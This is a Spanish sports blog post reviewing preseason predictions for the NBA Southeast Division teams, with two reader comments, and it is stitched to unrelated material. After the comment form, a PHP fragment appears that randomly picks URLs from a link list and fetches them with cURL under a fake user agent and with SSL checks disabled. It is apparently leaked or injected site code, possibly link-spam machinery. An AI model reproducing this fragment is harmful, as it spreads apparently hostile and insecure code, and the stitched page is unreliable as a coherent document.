Revisando pronósticos: Southeast

17 de February de 2014 por TheDeerHunter

ATLANTA HAWKS

Pronóstico Septiembre 2013: Entre el 7º y el 9º luchando por las ultimas posiciones de PO (38-44)
Probabilidad de acierto: Media
Calificación pronóstico: C-

Notable temporada la que están cuajando los Hawks hasta ahora, mejor de lo que pronosticábamos. Han logrado reinventarse con acierto después de la salida de un hombre tan importante para ellos como lo fue Josh Smith y la llegada de un nuevo técnico. Eran la tercera potencia del Este antes del “out of season” del dominicano Horford. No existe planificación posible a ese tipo de incidencias y lógicamente afectará al resultado.

Excelente trabajo el de Mike Buldenhozer. Juego de pase con aroma al maestro Popovich, del que fuera asistente. Quién hubiera dicho que este equipo iba a liderar la tabla de asistenciascon un base como Jeff Teague al que calificábamos como de “dirección un tanto anárquica”. Las similitudes con los Spurs no quedan ahí. Amplia explotación de la plantilla con 10-12 hombres sumando, sacando petróleo de lo que hay. Muchos están jugando el mejor baloncesto de su carrera y no parece casualidad. El equipo no ha perdido un ápice de su tradicional solidez pero están atacando como hacía mucho que no se veía por allí.

Lo de Horford fue un trauma pero motivó el paso adelante que han dado varios hombres que van a ser claves a medio plazo. No esperábamos que Paul Millsap mejorase sus años de los Jazz, ni que fuera a hacer olvidar tan pronto la figura de Josh Smith. Tampoco creíamos que Kyle Korver se convertiría en titular imprescindible (de hecho lo que nos llamaba la atención era su contrato). A Pero Antic nosotros lo conocíamos bien, ellos serán los sorprendidos. Carroll, Scott, Selvin Mack… casi todos están sumando minutos de mucha calidad. En el plano negativo quizá colocaríamos a John Jenkins a quien considerábamos teórico titular al principio y apenas ha contado.

En resumen, las temidas lesiones van a estropear lo que podía haber sido un año brillante para ellos. Es previsible que terminen peleando por las últimas plazas de playoffs y, en caso de clasificarse, ser eliminados sin remedio en primera ronda. La buena noticia es que han logrado construir una columna vertebral muy sólida para el futuro a medio plazo. Con sutiles retoques al estilo de Indiana este equipo podría ser muy peligroso a partir del curso que viene. 

CHARLOTTE BOBCATS

Pronóstico Septiembre 2013: Undécimos de Conferencia Este (35-47)
Probabilidad de acierto: Media-baja
Calificación pronóstico: C-

No íbamos demasiado desencaminados con el balance que adelantábamos. Lo que no podíamos imaginar es que rondando las 35 victorias un equipo podía estar en condiciones de disputar los playoffs.

La franquicia rompe con la marca Bobcats y recupera a los añorados Hornets al final de esta campaña y parece que se libra de una carga. Década oscura que será recordada fundamentalmente por fracasos. Ha sido volver a sonar el zumbido del abejorro en lontananza y la fortuna parece vislumbrarse en forma del camino hacia postemporada más despejado que nunca.

Ya no son el equipo infame que hemos sufrido desde 2011. Sabíamos que están aún verdes para asumir objetivos mayores pero al menos están haciendo algo bien, defender. Steve Clifford ha conseguido algo que nadie hubiera imaginado tan pronto: que se comporten en alguna faceta como un verdadero equipo. Un concepto que tenían muy olvidado por aquellos lares.

La apuesta por Al Jefferson, por una vez, ha salido bien. Ha asumido el rol de faro del equipo con franca naturalidad y su no inclusión en el partido de las estrellas es casi una afrenta. La vida cambia teniendo un referente de esta categoría. Da un poco de miedo pensar dónde estarían sin él (sobre todo ofensivamente) y la franquicia deberá de encontrar buenos complementos en el perímetro para consolidar la mejoría.

No todo ha sido de color de rosa. Con la elección de Cody Zeller mantienen una linea de desatino que ha sido motivo de mofa estos años. Tanto Kidd-Gilchrist como Biyombo han ido para atrás como los cangrejos.

En nuestro análisis aventurábamos que serán equipo de playoffs a partir del curso que viene. Igual lo logran antes pero aún les queda mucho trabajo por delante para asegurarse esa condición por méritos propios y no por deméritos ajenos.

MIAMI HEAT

Pronóstico Septiembre 2013: 1º de la Conferencia Este (61-21). Campeones de la NBA.
Probabilidad de acierto: Media-alta
Calificación pronóstico: B+/A

Será por nuestra naturaleza de haters latente pero aparentemente al campeón por antonomasia de la segunda década del siglo XXI comenzamos a verle las costuras.

El Big Three que parió Riley pierde a uno de sus pilares, Dwyane Wade, y a sus maltrechas rodillas en uno de cada tres partidos. Lógicamente un equipo con el talento tan concentrado lo debe de notar aunque la regular para ellos sea poco más que un trámite y la conferencia un paseo en barca.

Quizá estamos ante la mejor temporada de Chris Bosh desde que llegó a Miami y tanto Chris Andersen comoMichael Beasley están rindiendo por encima de lo que muchos esperaban. Sin embargo, eso no impide que el referente reboteador del equipo siga siendo LeBron James y que los Heat se vean obligados a abusar en demasiadas ocasiones de un small-ball que no siempre funciona frente a rivales, véase Indiana o Oklahoma, que cada vez parecen más preparados para contrarrestarlo. Los campeones son el peor equipo reboteador de la liga. En playoffs hay que hacerlo muy bien para contrarrestar una desventaja así.

Por otro lado, LeBron previsiblemente va a ceder este año el MVP a Durant y eso tampoco es buena señal. Recientemente parece haber pisado un poco el acelerador, aunque casi parece que está más concentrado en obtener el DPY que en otros premios premios individuales. Puede que este año lo consiga.

Todo para no decir demasiado. El verdadero análisis llegará cuando comiencen a jugarse en serio las habichuelas en las eliminatorias. Hasta ese momento hacen muy bien en regularse y no mostrar todas sus cartas. Nuestro análisis está en condiciones de cumplirse con exactitud pero hasta que los Heat no disputen su último partido del curso no lo podremos asegurar.

ORLANDO MAGIC

Pronóstico Septiembre 2013: 11º del Este (33-49)
Probabilidad de acierto: Baja
Calificación pronóstico: C-

Tenemos la suerte de contar con nuestro propio especialista en los Orlando Magic así que su opinión sobre la franquicia de Florida suele ir a misa. Sin embargo, por unas razones u otras no se están cumpliendo las expectativas.

Para empezar el interés por el próximo draft está totalmente desbocado. Muchas de las franquicias que se encontraban en tierra de nadie anhelaban el mayor número de papeletas posible. Por primera vez que recordemos hemos visto rankings de tankeo en los medios, o sea, cómo de “bien” lo están haciendo los equipos para perder el mayor número de partidos posibles. Otra cosa es que unos u otros se hayan podido dedicar a ello más o menos abiertamente ya que no conviene despertar la ira de la liga. Existen formas sutiles para facilitar la labor de perder. Salta a la vista que el potencial de los Magic no da para perder más del 70% de los partidos en condiciones normales y la demostración es que hemos visto que son capaces de doblegar a los equipos más fuertes del momento.

¿Queremos excusas? Algunos hombres importantes como Vucevic o Harris se han perdido un significativo número de partidos; Davis&Nelson han bajado un peldaño en rendimiento;  Harkless, Nicholson y Moore no han mantenido la progresión que prometían… En cambio, Arron Afflalo se ha destapado como uno de los mejores escoltas de la conferencia, o incluso de la liga.

Se estropea un poco el buen sabor de boca que nos dejaron el año pasado. Podemos entenderlo parcialmente. Esperemos por su bien que lo que logren en verano haga merecer la pena de una campaña de sinsabores para sus seguidores.

WASHINGTON WIZARDS

Pronóstico Septiembre 2013: 8º en el Este (41-41). Carne de primera ronda
Probabilidad de acierto: Media
Calificación pronóstico: B-

Lo divertido de este tipo de revisiones es encontrar perlas como ésta: “los cinco primeros puestos parecen asignados de carrerilla a Heat, Bulls, Nets, Pacers y Knicks, por las tres últimas plazas para entrar en postemporada habrá una auténtica pelea en el barro.” Se caen unos pocos de aquella quiniela y efectivamente el nicho vacante lo ocupó alguno de los que pensábamos que haría la guerra en el barrizal: “Raptors, los Pistons y los propios Wizards deberían ocupar los puestos del 6º al 8º, pero Cavaliers, Magic, Hawks, y en menor medida Bobcats, también estarán al acecho”. Había que ser Nostradamus para acertar el comportamiento de la conferencia.

En nuestro análisis dábamos por hecho algo que no era fácil. Los Wizards no están demasiado acostumbrados a moverse por el 50% de victorias y este curso es una constante. Como decíamos antes,lo que no pensábamos es que de esta guisa se peleara la parte alta del cuadro, pero así ha venido la cosa.

Con la excepción del flamante pick 3 del pasado draft, es una temporada razonablemente buena para ellos, rindiendo en un tono general más que correcto. Sin embargo, algunos pensamos que están dejando pasar una oportunidad de oro para posicionarse óptimamente de cara a las eliminatorias y mejorar así sus opciones de pasar alguna ronda. Algo falla en la psique de esta joven plantilla: 6 derrotas en prórroga, por tan sólo dos victorias y malos resultados en los partidos apretados. Quizá sea producto de esa “falta de cerebro” que aludía el articulo. Lo cierto es les falta un punto de pegada y eso en el filo de la navaja, cuando las defensas muerden más, es criminal.

La recta final de la regular suele colocar mejor las cosas en su sitio. Tiene toda la pinta que terminarán quedándose cerca del 50% y cayendo en primera ronda. El pronóstico es acertado.

Comenta

2 comentarios a esta entrada

  1. Denise dice:
    #1

    Respecto a mis dos analisis, sin quitar mérito a la temporada de los Hawks que están jugando por encima de lo que creía de ellos, creo que estan 5º también en parte por la debacle de equipos como Nets, Knicks, Cavs y Pistons. Porque aún contando con Horford, yo miro la plantilla y creo que la de Atlanta tiene mucha menos calidad y potencial que la de estos 4 equipos que tan mal lo están haciendo. Aun así, la temporada es larga y sin Horford más aún, por lo que no descartaría que los Hawks finalmente se quedasen fuera de PO. Como bien dices, decepcionante temporada de Jenkins quién tenía todo el espacio del mundo en el roster para haberse salido este año y ahora mismo es un paquete, todo lo contrario al buen hacer de Demarre Carroll en quién no tenía ninguna esperanza, y en Mike Scott que por la época era uno de estos típicos jugadores de la pretemporada sin contrato garantizado, y finalmente se ha hecho con el rol de 6º hombre del equipo.

    Por los Magic, no van a conseguir 33 victorias, echando calculos, creo que se moverán en torno a las 25-27 victorias, pero me reafirmo, este equipo no es tan malo para perder tanto por lo que si es el equipo más tankeador de la liga. Han tenido muchas lesiones de hombres claves, pero como casi todo el mundo diría yo.
    No sé si soy un Pro-Nelson y esto me deja ver la realidad, pero creo que a pesar de los años ya, el rendimiento de Nelson no ha decaido nada, por sensaciones y dejando números al margen que no tengo tiempo ahora de comprobar creo que debe ser ésta, una de sus mejores temporadas en cuanto a dirección de juego y acierto en el tiro exterior. En cambio, Davis sí, decepción total y desearía que saliese en este Deadline a cambio de lo que sea. De los jóvenes, sólo Nicholson creo que no ha progresado, quizás por sus 24 años que le hacen tener menor margen de progresión, pero Harkless me gusta mucho pero entre que Vaughn le tiene mareado con sus minutos que son una montaña rusa, y que le han puesto el rol de especialista defensivo, es verdad que en ataque está muy desaprovechado, pero este tio promete si se el cuida bien. Y Moore, pues bueno, el buen hombre no da para mucho más que para ser un hombre de rotación en el 1 y en el 2, y un microondas, y en ese contexto no lo hace mal, lo que no podemos es pedir peras al olmo.
    También, desde que a Vaughn le presionaron para quitar al tronco de Maxiell y darle sus minutos a Kyle O’Quinn, el equipo ha mejorado bastante.
    En fin, que no son tan malos pero creo toda la franquicia, incluido jugadores, están sumergidos en un ambiente tankeador que les ayude en este próximo Draft a salir de la Dwightmare.

      Citar

  2. Denise dice:
    #2

    Por cierto Deer, el día que publiques la revisión del analisis de los Blazers no apareceré por aquí, en ese artículo si que tienes material para darme cera de la buena. xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>